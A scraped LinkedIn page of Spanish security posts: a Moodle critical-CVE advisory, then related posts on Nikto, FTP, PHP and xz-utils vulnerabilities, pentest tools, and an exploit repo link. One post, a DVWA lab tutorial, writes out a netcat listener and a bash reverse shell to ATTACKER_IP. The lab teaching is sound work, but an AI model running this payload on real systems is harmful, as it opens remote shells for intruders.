Múltiples vulnerabilidades en #Moodle!!!! 🚨 🚨 🚨 Importancia 5 - Crítica Recursos Afectados Versiones anteriores que no reciban soporte actualmente y, además: Versiones 4.4 a 4.4.1; Versiones 4.3 a 4.3.5; Versiones 4.2 a 4.2.8; Versiones 4.1 a 4.1.11. Moodle ha publicado correcciones para 16 vulnerabilidades, 8 de ellas críticas. Su explotación podría permitir ejecución de código remoto, acceso a la información e inyección de código, entre otros. Las vulnerabilidades críticas son las siguientes: ◾ CVE-2024-43425: vulnerabilidad de ejecución remota de código a través de tipos de preguntas calculadas. Fueron necesarias restricciones adicionales para evitar el riesgo, por lo que se añadieron y/o actualizaron preguntas. ◾Debido a falta de desinfección, es posible la lectura de archivos, la falsificación de petición en sitios cruzados, inyección SQL o el Cross-site scripting. Esto afecta a las vulnerabilidades CVE-2024-43426, CVE-2024-43434, CVE-2024-43436 y CVE-2024-43439. ◾ CVE-2024-43428: vulnerabilidad de envenenamiento de caché al no requerir validación adicional del almacenamiento local. ◾ CVE-2024-43431: una comprobación insuficiente de las capacidades podría permitir eliminar insignias a las que un usuario no tiene permiso de acceso. ◾CVE-2024-43440: vulnerabilidad que podría provocar un riesgo de inclusión de archivos locales al restaurar copias de seguridad en bloque. https://lnkd.in/gjgJM-5b #soc #vulnerabilidad #ciberseguridad
Publicación de Forensic & Security
Más publicaciones relevantes
-
Nikto: Una herramienta esencial para la evaluación de seguridad web 🌐🔒 Nikto es una herramienta de escaneo de servidores web diseñada para identificar vulnerabilidades, configuraciones inseguras y problemas que puedan comprometer un servidor. Es ampliamente utilizada por expertos en ciberseguridad y pentesters debido a su capacidad para proporcionar información detallada sobre posibles fallos en aplicaciones web. ¿Qué puede hacer Nikto? Identificar vulnerabilidades comunes: Detecta configuraciones inseguras, archivos sensibles, y exploits conocidos. Detectar software desactualizado: Escanea versiones de servidores y bibliotecas para encontrar software obsoleto. Analizar encabezados HTTP: Busca configuraciones que puedan exponer información sensible. Comprobaciones específicas: Compatible con una variedad de plugins para personalizar los análisis. Ventajas de Nikto Código abierto y gratuito: Accesible para cualquier profesional o entusiasta de la ciberseguridad. Fácil de usar: Ideal tanto para principiantes como para expertos. Actualización constante: Su base de datos se actualiza frecuentemente con nuevas vulnerabilidades y exploits. Compatibilidad amplia: Funciona con la mayoría de los sistemas operativos basados en Unix y Windows. Cómo usar Nikto Instálalo mediante Git: bash git clone https://lnkd.in/eFHz-H2X cd nikto/program perl nikto.pl -h [dirección_del_servidor] Ejecuta un escaneo básico: bash perl nikto.pl -h https://ejemplo.com Personaliza el análisis con opciones avanzadas como puertos específicos o informes detallados. Limitaciones de Nikto Aunque potente, Nikto tiene sus límites: Análisis visible: No es sigiloso, y sus escaneos pueden ser detectados por sistemas de monitoreo. No reemplaza un análisis exhaustivo: Es una herramienta complementaria y no abarca todos los aspectos de la seguridad. ¿Por qué es importante? Nikto es una pieza clave en cualquier estrategia de seguridad web. Permite identificar rápidamente problemas que podrían ser explotados, ayudando a las empresas a mejorar su postura de seguridad. #Ciberseguridad #Nikto #Pentesting #SeguridadWeb #Vulnerabilidades
GitHub - sullo/nikto: Nikto web server scanner
github.com
Inicia sesión para ver o añadir un comentario.
-
Sabias que... #Sabiasque es FTP? Tengo la necesidad de hablar sobre este protocolo. El motivo es que acabo de leer en un blog un error garrafal. FTP, File Transfer Protocol, en nuestro idioma, Protocolo de Transferencia de Archivos, es uno de los protocolos más usados en el desarrollo web. Quiero decir, que el desarrollador web lo utiliza mucho. FTP y Telnet, otro protocolo, son los que conocí nada más conocer Internet y cuando compartía archivos. Sí, una vez fui joven... En mi caso compartía todas las charlas de IRC-Hispano que se logueaba (guardaba en formato txt) de canales relacionadas con la ciberseguridad. Monté mi primer FTP, y aquí es cuando me linchan los compañeros de ciberseguridad, en un Linux Mandrake. Más viejo que la tana... Estuve semanas mirando como se hacía, se personalizaba y un largo etc. Cuando hice la prueba con un archivo, me sentí que lo sabía todo... imagina que inocente era allá en el año 96. A saber donde andarán esos textos y Ezines que guardaba como oro... Pero por FTP, NO puedes realizar la gestión de exportar una base de datos a un archivo .sql y restaurar. Como mucho, y si esta creado, un archivo de una base de datos si que puedes, pero antes tenemos que hacer la exportación. Es que eso de "toma el FTP que con eso tienes..." NO basta para hacer migraciones de servidor a servidor. Pero, otro pero sí, si que puedes acceder a datos para conectar a esa base de datos si por ejemplo tenemos un WordPress. Es por eso que tenemos que saber limitar muchas cosas y que no se llegue jamás a dicho archivo para conectar luego a la base de datos. En fin, que ya sé que todo esto es complejo, pero podemos liarla mucho si dejamos entrar a todo el mundo o tenemos definido una cuenta GUEST (Invitado) en el FTP.
Inicia sesión para ver o añadir un comentario.
-
⚫ Técnicas de Codificación Bash Reverse Shell en DVWA usando Linux. 💻 La reverse shell es una técnica avanzada utilizada en pruebas de penetración para establecer una conexión inversa con el sistema objetivo. Una herramienta popular para practicar esto es el Damn Vulnerable Web Application (DVWA), una aplicación web intencionalmente vulnerable que permite aprender y experimentar en un entorno controlado. En este post, exploraremos cómo utilizar el sistema operativo Linux para ejecutar técnicas de reverse shell en DVWA usando bash. La reverse shell permite al atacante iniciar una conexión inversa desde el sistema objetivo hacia el sistema del atacante. En lugar de que el atacante acceda directamente al objetivo, es el objetivo quien inicia la conexión. Esto es útil cuando los firewalls bloquean las conexiones entrantes, pero no las salientes. Prerrequisitos. 📌 Tener instalado DVWA en un entorno virtual o en un servidor de prueba. 📌 Un sistema Linux para ejecutar los comandos y recibir la conexión. 📌 Configurar DVWA en modo Bajo o Medio, donde las medidas de seguridad sean menos restrictivas. Ejecución de una Reverse Shell en Bash Paso 1: Configuración del Listener En el sistema Linux del atacante, abriremos un listener que espera la conexión entrante. Esto se puede hacer con netcat (nc) en un puerto específico: 📌 nc -lvp 4444 📌-lvp: Espera la conexión en el puerto especificado (4444 en este caso). Paso 2: Codificación de la Reverse Shell en Bash En el sistema objetivo (DVWA), aprovecharemos una vulnerabilidad en una sección de la aplicación donde podemos ejecutar código. Utilizaremos un payload en Bash para abrir una conexión de regreso al sistema atacante. Un ejemplo de código Bash para la reverse shell: 📌 bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 Reemplaza ATTACKER_IP con la IP del sistema atacante y el puerto (4444) debe coincidir con el usado en el listener. Paso 3: Ejecuta el Payload en DVWA Dirígete a una sección vulnerable de DVWA donde puedas introducir comandos (por ejemplo, la sección de comandos en el nivel de seguridad bajo). Escribe el código de la reverse shell en el campo de comandos y ejecuta. Paso 4: Verifica la Conexión Si el payload se ejecutó correctamente, en el sistema atacante, deberías ver una conexión establecida en el terminal donde configuraste el listener. Ahora tienes acceso al sistema objetivo a través de la reverse shell. Esta práctica solo debe realizarse en entornos de prueba y bajo autorización en sistemas de producción. La técnica de reverse shell puede ser peligrosa si no se maneja adecuadamente, ya que podría dar acceso completo a un intruso. La reverse shell en Bash es solo una de las muchas técnicas que se pueden probar en este entorno, y conocerla es esencial para fortalecer las defensas y entender cómo funciona desde una perspectiva ofensiva. MANUEL NAVARRO HIDALGO #Ciberseguridad #Linux #Shell #Bash #Entorno #Ataques #Comandos #Intrusión #DVWA #Técnicas #EntornodePruebas #Listener
Inicia sesión para ver o añadir un comentario.
-
-
Fundamentos de Redes para Pentesters
Alanis Marcela Orozco Rivas
app.kajabi.com
Inicia sesión para ver o añadir un comentario.
-
Últimamente se ha estado hablando mucho sobre el nuevo CVE-2024-24919, una vulnerabilidad existente en las Security Gateways de Check Point que tengan activado el software VPN de acceso remoto o de acceso móvil. Informándome un poco de esta vulnerabilidad he hecho mi propio ejecutable en python para identificar y explotar de manera automatizada este fallo de seguridad Lo he subido como repositorio en github, con información extra de como funciona el POC y como encontrar paginas vulnerables
GitHub - Rug4lo/CVE-2024-24919-Exploit: CVE-2024-24919 Exploit and PoC - Critical LFI for Remote Access VPN or Mobile Access.
github.com
Inicia sesión para ver o añadir un comentario.
-
Una vulnerabilidad crítica de Ejecución Remota de Código (RCE) en PHP para Windows, identificada como CVE-2024-4577, permite a atacantes tomar control de servidores (se cree que puede afectar a millones de servidores). Afecta a PHP antes de las versiones 8.3.8, 8.2.20 y 8.1.29. Se recomienda actualizar y aplicar reglas mod_rewrite como solución.
PHP addressed critical RCE potentially impacting millions of servers
https://securityaffairs.com
Inicia sesión para ver o añadir un comentario.
-
[Wireguard Mikrotik Config Generator] Time is money my friend!!! Me ha pasado (en varias ocasiones) que necesito crear uno o varios clientes o peers para los servidores VPN Wireguard en MikroTik y hacerlo de forma manual es un proceso muy tedioso. Haciendo uso de mis cada vez menos limitados conocimientos de scripting en Python y con ayuda de la IA, he creado este script que te ayudará a ahorrar tiempo y a simplificar el trabajo. Al ejecutarlo, tiene dos variantes: 1- Servidor + Peers 2- Solo Peers El proceso es sencillo, te pregunta todo el tiempo los datos necesarios para cada caso y te dejo un ejemplo en la línea para que te guies, si lo deseas puedes dar enter a todos los valores y te he preparado una configuración básica (Esto es para cuando estás creando el servidor también) si solo escoges la opción de Peers debes adaptar los valores a tu caso. Solo es obligatiorio el dato de la dirección IP pública o FQDN porque será diferente en cada caso. Al terminar de ejecutar el script se te habrá creado un directorio nuevo (wireguard-configs) y dentro tendrás: - Un directorio (qrcodes) con las fotos de todos los clientes que decidiste crear. - Un fichero (mikrotik_commands.rsc) con los comandos necesarios para la configuración en la parte del Mikrotik. (en caso de no tener ningún servidor te lo crea, incluyendo configuraciones como la dirección IP y las reglas del firewall, etc) - Tantos ficheros (peer_xx.conf) como clientes hayas decidido crear. Espero que te ayude a ganar tiempo creando este tipo de configuraciones. Lo he subido a GitHub y te dejo el enlace al proyecto en el primer comentario. Cabe aclarar que es la primera versión, si ves que necesita algún cambio o mejora me gustaría que me lo comentes. De momento trabajaré en temas de validaciones de los datos escritos por el usuario... #github #wireguard #vpn #ciberseguridad #mikrotik #python
Inicia sesión para ver o añadir un comentario.
-
-
🔐 𝗡𝘂𝗲𝘃𝗼 𝗠𝗶𝗻𝗶-𝗣𝗿𝗼𝘆𝗲𝗰𝘁𝗼: 𝗚𝗲𝗻𝗲𝗿𝗮𝗱𝗼𝗿 𝘆 𝗩𝗮𝗹𝗶𝗱𝗮𝗱𝗼𝗿 𝗱𝗲 𝗖𝗼𝗻𝘁𝗿𝗮𝘀𝗲ñ𝗮𝘀 𝗲𝗻 𝗚𝗼 🔐 Hoy quiero compartir con ustedes un mini-proyecto que desarrollé como parte de mi aprendizaje continuo en 𝗚𝗼 🎓. Se trata de un Generador y Validador de Contraseñas que me permitió explorar las capacidades de este lenguaje para manejar la seguridad de manera sencilla pero efectiva. El proyecto está dividido en dos partes: 𝗚𝗲𝗻𝗲𝗿𝗮𝗱𝗼𝗿 𝗱𝗲 𝗖𝗼𝗻𝘁𝗿𝗮𝘀𝗲ñ𝗮𝘀: Capaz de crear contraseñas con distintos niveles de complejidad, desde básicas hasta muy seguras, incluyendo mayúsculas, números y símbolos. 𝗩𝗮𝗹𝗶𝗱𝗮𝗱𝗼𝗿 𝗱𝗲 𝗖𝗼𝗻𝘁𝗿𝗮𝘀𝗲ñ𝗮𝘀: Un simple sistema de puntuación que evalúa la fortaleza de una contraseña basada en su longitud y los tipos de caracteres que contiene. Si bien es un proyecto pequeño, me ayudó a afianzar conceptos fundamentales de 𝗚𝗼 y a seguir desarrollando mi capacidad para construir soluciones útiles con este lenguaje. 🧑💻 Les dejo el repositorio en GitHub para que puedan darle un vistazo: https://lnkd.in/dB-idkRF Cualquier feedback o sugerencia es más que bienvenido. ¡Seguimos aprendiendo! 🚀 #Golang #programming #passwordsecurity #learning #development
GitHub - EstebanHorn/Password: A package for generating and validating passwords with customizable complexity levels. It provides functions to create passwords of varying strengths and to assess their security based on length and character variety.
github.com
Inicia sesión para ver o añadir un comentario.
-
Nuevo Intento de ataque a la cadena de suministro. El 29 de Marzo de 2024 casi que por casualidad un desarrollador de Microsoft detectó un Backdoor en una versión experimental de xz-utils. Esta es una suite de software que los desarroladores usan para compresión y en resumen es muy comunmente usado y es muy probable que cualquier sistema Linux o macOS hagan uso del mismo. Que significa esto? Que de no haberse descubierto este backdoor, el mismo habría sido instalado en millones de sitemas en e mundo, potencialmente dando a los atacantes acceso y ejecución de comandos en dichos sistemas. Un poco mas de la historia y algunas recomendaciones en el siguiente articulo. #JavaScript #OSS #CyberTalk #Infosec
Is open source under siege? - CyberTalk
cybertalk.org
Inicia sesión para ver o añadir un comentario.
-
🔍 Cervantes: La Plataforma de Código Abierto para Pentesters y Red Teams Cervantes es una poderosa plataforma colaborativa de código abierto, diseñada específicamente para pentesters y red teams. Ofrece un entorno centralizado que facilita la gestión de proyectos, clientes, vulnerabilidades e informes, todo dentro de un espacio seguro con autenticación 2FA y gestión avanzada de roles. 🛠️ Características Clave de Cervantes: - Gestión Integral de Proyectos y Clientes: Organiza y gestiona fácilmente todos tus proyectos de pentesting y compromisos con clientes en una única plataforma, asegurando un control total y evitando que algo se pierda. - Automatización con IA: Simplifica tareas repetitivas con la integración de inteligencia artificial, aumentando la eficiencia y reduciendo el esfuerzo manual. - Informes Modulares: Crea informes personalizados utilizando diferentes componentes según las necesidades de cada proyecto. - Integración con Jira: Conéctate fácilmente para un seguimiento continuo de vulnerabilidades, sin interrupciones en tu flujo de trabajo. - Soporte Multiplataforma y Multilenguaje: Disponible en inglés y español, y adaptable a diversas plataformas para satisfacer tus necesidades específicas. - Seguimiento de Vulnerabilidades: Mantén un control preciso de las vulnerabilidades, permitiendo una identificación, documentación y mitigación eficiente a lo largo de tus proyectos. - Informes Centralizados: Genera y gestiona informes de manera eficiente desde un solo lugar, garantizando resultados consistentes, profesionales y completos para tus clientes. Cervantes está diseñado para fomentar la colaboración, convirtiéndose en la plataforma ideal para equipos que buscan optimizar su flujo de trabajo, mejorar la comunicación y ofrecer resultados de alta calidad. 🚀 ¿Por qué elegir Cervantes? - Colaborativo: Trabaja de manera fluida con tu equipo, compartiendo ideas, siguiendo el progreso y manteniendo la alineación durante todo el ciclo de vida de tus proyectos. - Personalizable y Extensible: Adapta Cervantes a tus necesidades específicas de flujo de trabajo e intégralo fácilmente con otras herramientas en tu arsenal de ciberseguridad. - Open Source: Únete a una comunidad creciente de profesionales de la seguridad que están contribuyendo a la evolución de Cervantes, impulsando la innovación y mejorando el panorama de la seguridad. 🔗 Explora Cervantes en GitHub: https://lnkd.in/dQiBbKi4 Ya sea que busques optimizar tus operaciones de pentesting o mejorar la efectividad de tu equipo de red, Cervantes tiene las herramientas que necesitas para tu equipo. 🌐🔒
GitHub - CervantesSec/cervantes: Cervantes is an open-source, collaborative platform designed specifically for pentesters and red teams. It serves as a comprehensive management tool, streamlining the organization of projects, clients, vulnerabilities, and reports in a single, centralized location.
github.com
Inicia sesión para ver o añadir un comentario.
WordPress Manager & Solution Provider, Frontend Developer
5 mesesSolo me queda un cliente con moodle y lo descartan ahora en septiembre! menos mal :)